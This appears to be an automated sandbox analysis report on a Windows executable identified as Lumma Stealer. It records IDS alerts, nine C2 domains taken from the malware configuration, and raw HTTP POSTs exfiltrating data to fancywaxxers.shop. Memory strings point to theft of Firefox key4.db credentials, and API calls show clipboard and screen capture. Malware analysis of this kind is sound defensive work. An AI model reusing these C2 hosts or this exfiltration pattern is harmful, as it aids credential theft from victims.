Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49715 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49736 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2058657 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI) : 192.168.2.6:49720 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49712 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49718 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49713 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49713 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49736 -> 104.21.32.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: fancywaxxers.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop

Source: Joe Sandbox View

IP Address: 104.21.32.1 104.21.32.1

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49717 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49736 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49720 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XTEVJ4K09XD5XLUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12841Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SJ9KEQ9EX23R4F2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15087Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XF7EXX2N03UIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19927Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WZ9VX7QJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1185Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KCJP2GIMZMWWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587484Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: fancywaxxers.shop

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: UhsjR3ZFTD.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://ocsp.entrust.net02
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: UhsjR3ZFTD.exe	String found in binary or memory: http://www.entrust.net/rpa03
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2157999207.0000000005461000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: UhsjR3ZFTD.exe, 00000003.00000003.2192097972.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227208638.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181347543.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227144209.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E6C000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005459000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217324289.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228040812.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191841142.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/
Source: UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E83000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/9
Source: UhsjR3ZFTD.exe, 00000003.00000003.2217269597.0000000002E97000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227208638.0000000002F05000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2157571888.0000000002F12000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227249666.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2217324289.0000000002EE7000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200483086.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F13000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191922285.0000000002F10000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005450000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228040812.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2228022285.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2170817201.0000000002F10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/api
Source: UhsjR3ZFTD.exe, 00000003.00000003.2217230257.0000000002F06000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201149843.0000000002F06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiE
Source: UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E96000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apiM
Source: UhsjR3ZFTD.exe, 00000003.00000003.2146982186.0000000005450000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop/apid
Source: UhsjR3ZFTD.exe, 00000003.00000003.2134252099.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/api
Source: UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/apil
Source: UhsjR3ZFTD.exe, 00000003.00000003.2181421854.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/apitPK
Source: UhsjR3ZFTD.exe, 00000003.00000003.2201305187.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2200589372.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2227004890.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000002.2227827824.0000000002E73000.00000004.00000020.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2191976803.0000000002E73000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fancywaxxers.shop:443/apixt.default-release/key4.dbPK
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: UhsjR3ZFTD.exe, 00000003.00000003.2191772467.0000000005448000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2170745627.0000000005445000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2169941654.0000000005441000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&re
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: UhsjR3ZFTD.exe	String found in binary or memory: https://www.entrust.net/rpa0
Source: UhsjR3ZFTD.exe, 00000003.00000003.2135883699.0000000005489000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135732293.000000000548C000.00000004.00000800.00020000.00000000.sdmp, UhsjR3ZFTD.exe, 00000003.00000003.2135810672.0000000005489000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: UhsjR3ZFTD.exe, 00000003.00000003.2158920512.000000000545D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: UhsjR3ZFTD.exe, 00000003.00000003.2158920512.000000000545D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159017711.000000000556B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: UhsjR3ZFTD.exe, 00000003.00000003.2159322011.0000000005449000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49736 version: TLS 1.2

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 3_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00432D70

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 3_2_00432D70 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_00432D70

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe

Code function: 3_2_00432FE0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,

3_2_00432FE0

Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006E0412	0_2_006E0412
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006D34A0	0_2_006D34A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006CDE42	0_2_006CDE42
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006DE6FE	0_2_006DE6FE
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 0_2_006C973B	0_2_006C973B
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00421060	3_2_00421060
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00438860	3_2_00438860
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00426000	3_2_00426000
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00419362	3_2_00419362
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043FB80	3_2_0043FB80
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043BCE0	3_2_0043BCE0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004384F0	3_2_004384F0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00440480	3_2_00440480
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00418DF1	3_2_00418DF1
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004095A0	3_2_004095A0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00408640	3_2_00408640
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0040D6F8	3_2_0040D6F8
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042BE8A	3_2_0042BE8A
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00429040	3_2_00429040
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00438040	3_2_00438040
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0042A050	3_2_0042A050
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00425850	3_2_00425850
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00432800	3_2_00432800
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_00419820	3_2_00419820
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_0043F0CB	3_2_0043F0CB
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004038D0	3_2_004038D0
Source: C:\Users\user\Desktop\UhsjR3ZFTD.exe	Code function: 3_2_004058E0	3_2_004058E0
